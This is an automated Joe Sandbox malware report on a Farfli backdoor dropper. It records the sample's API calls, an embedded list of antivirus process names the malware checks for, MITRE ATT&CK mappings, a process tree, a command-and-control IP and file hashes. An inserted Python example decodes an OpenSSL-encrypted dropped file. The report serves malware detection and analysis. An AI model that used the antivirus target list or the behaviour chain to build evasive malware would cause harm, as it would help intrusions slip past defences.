Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04285D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_04285D22
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00404FAA KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: kwpswnsserver.exe | Binary or memory string: acs.exe
Source: kwpswnsserver.exe | Binary or memory string: avcenter.exe
Source: kwpswnsserver.exe | Binary or memory string: kxetray.exe
Source: kwpswnsserver.exe | Binary or memory string: vsserv.exe
Source: kwpswnsserver.exe | Binary or memory string: avp.exe
Source: kwpswnsserver.exe | Binary or memory string: cfp.exe
Source: kwpswnsserver.exe | Binary or memory string: KSafeTray.exe
Source: kwpswnsserver.exe | Binary or memory string: 360Safe.exe
Source: kwpswnsserver.exe | Binary or memory string: 360tray.exe
Source: kwpswnsserver.exe | Binary or memory string: rtvscan.exe
Source: kwpswnsserver.exe | Binary or memory string: TMBMSRV.exe
Source: kwpswnsserver.exe | Binary or memory string: ashDisp.exe
Source: kwpswnsserver.exe | Binary or memory string: 360Tray.exe
Source: kwpswnsserver.exe | Binary or memory string: avgwdsvc.exe
Source: kwpswnsserver.exe | Binary or memory string: AYAgent.aye
Source: kwpswnsserver.exe | Binary or memory string: QUHLPSVC.EXE
Source: kwpswnsserver.exe | Binary or memory string: RavMonD.exe
Source: kwpswnsserver.exe | Binary or memory string: Mcshield.exe
Source: kwpswnsserver.exe | Binary or memory string: K7TSecurity.exe
MITRE ATT&CK matrix, listed per tactic; the number in parentheses is the count of matched signatures for that technique, techniques without a number had no match.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (1); Native API (11); Command and Scripting Interpreter (2); PowerShell (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Scripting (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (222); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (222); Indicator Removal (1)
Credential Access: Input Capture (141); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (2); Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (38); Security Software Discovery (141); Virtualization/Sandbox Evasion (31); Process Discovery (4); Application Window Discovery (11); Network Sniffing; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (11); Screen Capture (1); Input Capture (141); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (2); Non-Standard Port (1); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Data Encrypted for Impact (1); System Shutdown/Reboot (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1581339 | Sample: OdiHmn3pRK.exe | Start date: 27/12/2024 | Architecture: WINDOWS | Score: 100
Signatures on the root node: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 5 other signatures
Process tree (as recovered from the behavior graph):
  • OdiHmn3pRK.exe (started)
    dropped: C:\Users\Public\Bilite\linit-v4.1.6.exe (PE32); C:\Users\Public\Bilite\...\kwpswnsserver.exe (PE32); Microsoft.WindowsA...ntime.Bootstrap.dll (PE32)
    • cmd.exe (started); signature: Bypasses PowerShell execution policy
      • kwpswnsserver.exe (started)
        network: 118.107.44.219, ports 18852, 19091, 49786 (BCPL-SGBGPNETGlobalASNSG, Singapore)
        dropped: C:\Users\user\AppData\Local\Temp\backup.exe (PE32); C:\Users\user\AppData\Local\Temp\backup.dll (PE32); C:\Users\user\AppData\Local\updated.ps1 (ASCII)
        signatures: Detected unpacking (creates a PE file in dynamic memory); Found evasive API chain (may stop execution after checking mutex); Contains functionality to inject threads in other processes; 2 other signatures
        • cmd.exe (started)
          • powershell.exe (started)
          • conhost.exe (started)
        • cmd.exe (started)
          • powershell.exe (started); signature: Loading BitLocker PowerShell Module
          • conhost.exe (started)
        • cmd.exe (started)
          • conhost.exe (started)
          • tasklist.exe (started)
          • timeout.exe (started)
          • 10 other processes
      • conhost.exe (started)

Source | Detection | Scanner | Label
OdiHmn3pRK.exe | 28% | Virustotal |
OdiHmn3pRK.exe | 61% | ReversingLabs | Win32.Backdoor.Farfli
Source | Detection | Scanner | Label
C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dll | 65% | ReversingLabs | Win32.Backdoor.Farfli
C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | 0% | ReversingLabs |
C:\Users\Public\Bilite\linit-v4.1.6.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\backup.dll | 65% | ReversingLabs | Win32.Backdoor.Farfli
C:\Users\user\AppData\Local\Temp\backup.exe | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1 | 0% | Avira URL Cloud | safe
http://go.microsoftM | 0% | Avira URL Cloud | safe
http://line.naver.jp0 | 0% | Avira URL Cloud | safe
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000011.00000002.2589700314.0000000005985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1 | powershell.exe, 00000011.00000002.2594783781.0000000006F20000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.sectigo.com0 | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://line.naver.jp0 | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000011.00000002.2583492661.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2583492661.0000000005017000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://terms.line.me/line_terms?lang=en= | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lBkq | powershell.exe, 00000011.00000002.2583492661.0000000004921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.0000000004891000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://terms.line.me/line_terms?lang=id | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://terms.line.me/line_terms?lang=ko | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.micro | powershell.exe, 00000012.00000002.2584243863.0000000007329000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://terms.line.me/line_terms?lang=en | OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://desktop.line-scdn.net/win/bin/real/installer/installer.jsonSoftware | OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000011.00000002.2583492661.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2583492661.0000000005017000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000011.00000002.2589700314.0000000005985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://terms.line.me/line_terms?lang=es | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://terms.line.me/line_terms?lang=th | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://go.microsoftM | powershell.exe, 00000011.00000002.2594783781.0000000006F20000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://terms.line.me/line_terms?lang=ja | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://terms.line.me/line_terms?lang=zh-Hant | OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000011.00000002.2583492661.0000000004921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.0000000004891000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
118.107.44.219 | unknown | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581339
Start date and time: 2024-12-27 13:08:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OdiHmn3pRK.exe (renamed because the original name is a hash value)
Original Sample Name: 11933d4b44331258739282e769ca4914.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@43/29@0/1
EGA Information:
  • Successful, ratio: 50%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 127
  • Number of non-executed functions: 273
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps longer than 100000000ms are automatically reduced to 1000ms
  • Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
  • Processes excluded from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • IPs excluded from analysis (whitelisted): 20.109.210.53, 13.107.246.63
  • Domains excluded from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 2200 because it is empty
  • Execution Graph export aborted for target powershell.exe, PID 3020 because it is empty
  • Not all processes were analyzed; the report is missing behavior information
  • Report size exceeded maximum capacity and may be missing behavior information
  • Report size exceeded maximum capacity and may be missing disassembly code
  • Report size getting too big, too many NtCreateKey calls found
  • Report size getting too big, too many NtEnumerateKey calls found
  • Report size getting too big, too many NtOpenKeyEx calls found
  • Report size getting too big, too many NtQueryValueKey calls found
                                                                No simulations
                                                                No context
                                                                No context
Match (ASN): BCPL-SGBGPNETGlobalASNSG
Associated Sample Name / URL                         Detection   Threat Name   Context
S1Rv3ioghk.exe                                       malicious   Unknown       118.107.44.112
WiezmDFd6L.exe                                       malicious   Unknown       134.122.155.90
armv7l.elf                                           malicious   Unknown       134.122.132.194
492c3445eddadc4b2c411a6eb79813339a0b3fc6d2d69.dll    malicious   Unknown       134.122.134.93
rQuotation.exe                                       malicious   FormBook      202.95.11.110
3.elf                                                malicious   Unknown       137.220.247.57
MicrosoftEdgeUpdateSetup.exe                         malicious   Unknown       134.122.134.93
SWIFT COPY.exe                                       malicious   FormBook      134.122.191.187
http://93287.mobi                                    malicious   Unknown       137.220.229.108
T2dvU8f2xg.exe                                       malicious   Unknown       118.107.29.172
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:openssl enc'd data with salted password, base64 encoded
                                                                Category:dropped
                                                                Size (bytes):56
                                                                Entropy (8bit):4.854067815178066
                                                                Encrypted:false
                                                                SSDEEP:3:iqkdQkBhiBVoXGrY:ilVK/rY
                                                                MD5:EB6D2B5C9717D35BBC4857BBBB10A0EB
                                                                SHA1:09BE1DF6AC449BC9447EBDD9435D4F07B797F299
                                                                SHA-256:B78047999312677DDE213A7C6424CF8132BD41E167C6D4CA2BEADC39B8CD4F9C
                                                                SHA-512:36FF67C3643FCDA0A1BB54C31BBF03F95551546A1448E9C05745C8E5DCEC1B54C893CE26FE6CCAC586F24589F6C2CAB50E1BA2224225BD1BE90A814ECC6F94C1
                                                                Malicious:false
                                                                Preview:U2FsdGVkX19IuirF87UgYAbEVFkkLbiXFc9z85LW9X2xzFfr234rdQ==
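The 56-byte file above is an `openssl enc` blob: its preview decodes to the literal "Salted__" magic, an 8-byte salt and the ciphertext. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code. It parses that exact preview string, reports the salt, and records what the ciphertext length implies about the cipher; it also implements OpenSSL's legacy EVP_BytesToKey (MD5, one round), the key derivation `openssl enc` uses when -pbkdf2 is not given, so a recovered passphrase can be turned into a key and IV. The passphrase "password" in the usage lines is a placeholder, not a value from the report.

```python
import base64
import hashlib

# Preview string of the 56-byte dropped file, copied from the report entry above.
SALTED_B64 = "U2FsdGVkX19IuirF87UgYAbEVFkkLbiXFc9z85LW9X2xzFfr234rdQ=="

# `openssl enc -salt` writes this 8-byte magic, then an 8-byte salt, then ciphertext.
OPENSSL_MAGIC = b"Salted__"


def is_openssl_salted(b64_text: str) -> bool:
    """True if the base64 text decodes to data carrying the Salted__ header."""
    try:
        raw = base64.b64decode(b64_text, validate=True)
    except (ValueError, TypeError):
        return False
    return len(raw) >= 16 and raw[:8] == OPENSSL_MAGIC


def parse_openssl_salted(b64_text: str) -> dict:
    """Split an `openssl enc` blob into salt and ciphertext and note what the
    ciphertext length implies about the cipher.

    A padded block cipher yields ciphertext that is a whole number of blocks, so
    a length that is not a multiple of 16 rules out AES in CBC/ECB, while a
    multiple of 8 is still consistent with 64-bit block ciphers (DES, 3DES,
    Blowfish, CAST5) and with any stream mode (CTR/OFB/CFB) of any cipher.
    """
    if not is_openssl_salted(b64_text):
        raise ValueError("not an openssl enc salted blob")
    raw = base64.b64decode(b64_text, validate=True)
    salt, ciphertext = raw[8:16], raw[16:]
    return {
        "total_len": len(raw),
        "salt_hex": salt.hex(),
        "ciphertext_len": len(ciphertext),
        "aes_cbc_possible": len(ciphertext) % 16 == 0,
        "block64_or_stream_possible": len(ciphertext) % 8 == 0,
    }


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int, iv_len: int,
                     count: int = 1) -> tuple:
    """OpenSSL's legacy EVP_BytesToKey with MD5: D_1 = MD5(pw||salt),
    D_i = MD5(D_{i-1}||pw||salt), each re-hashed count-1 more times, and the
    D_i concatenated until key_len + iv_len bytes are available."""
    derived, prev = b"", b""
    while len(derived) < key_len + iv_len:
        block = hashlib.md5(prev + password + salt).digest()
        for _ in range(count - 1):
            block = hashlib.md5(block).digest()
        derived += block
        prev = block
    return derived[:key_len], derived[key_len:key_len + iv_len]


if __name__ == "__main__":
    info = parse_openssl_salted(SALTED_B64)
    print(info)
    # "password" is a placeholder passphrase; the real one is not in the report.
    key, iv = evp_bytes_to_key(b"password", bytes.fromhex(info["salt_hex"]), 32, 16)
    print("AES-256 key candidate:", key.hex(), "iv:", iv.hex())
```

The 40 decoded bytes leave 24 bytes of ciphertext, which is not a multiple of 16, so AES in CBC or ECB is excluded; a 64-bit block cipher or a stream mode is consistent with it. Without the passphrase, and without knowing whether the dropper used EVP_BytesToKey or PBKDF2, the plaintext cannot be recovered from this entry alone; the parser only tells you which attempts are worth making.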
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2290456
                                                                Entropy (8bit):6.607149462612304
                                                                Encrypted:false
                                                                SSDEEP:49152:hyT6UzfP7fyC5fJVOWsL6FpGgxv4v9c2Ut3n1gp0pci3YKLjX:hK6UzfP73RVOWmMZxvwc2Ut3n6p0pciV
                                                                MD5:4A55B0873DAD6B4F9506589C6B341D4E
                                                                SHA1:5231E7DF7BE7C3B1C145BDF2BC8E5E23C8540898
                                                                SHA-256:DFBD06B0B2C121153B0DE4B809778CEA1A43E754E6D18B254BA8902902850CF4
                                                                SHA-512:297F0A3F2442A2C70BF5828C0C60B228D043F2BF80D9305FF6F2AE15328040F7B5634D36529E0CAC53E90F084208A630B2C8E8C0C5C70B4E9A130B8FB3895C0D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 65%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....cg...........!.........<......S .......................................`#...........@.................................3...h..... ..H............"..)... !..0.......................... b......p................................................text...}........................... ..`.rdata...^.......`..................@..@.data......... ..^..................@....00cfg........ ......L .............@..@.tls.......... ......N .............@....rsrc....H.... ..H...P .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):315264
                                                                Entropy (8bit):6.663282350107098
                                                                Encrypted:false
                                                                SSDEEP:6144:rcaBfTrqYPy8brrIQYDW6AgoY7fJA3p+anDhDAOHlPzJD:rca48brrIQYDW6AgpAzjzJD
                                                                MD5:607336E586D1BD00DCF1CA7EED97A8DB
                                                                SHA1:1B10CCE801F12E277DEFD9D16FC3F4EEBCCE3344
                                                                SHA-256:A5DD0996B950D443A04F8589EAF7AEA16C9420D9B72D336F283F95DC74BFC79C
                                                                SHA-512:61A81D218090BDFAAADB6AA87C407984FDA14C62D98397817D9AAD1A0350E7C4E0A7FD884D71081EB15044CF0D06C1B9715C822DC50831A03D63EF66AEB2BEFA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
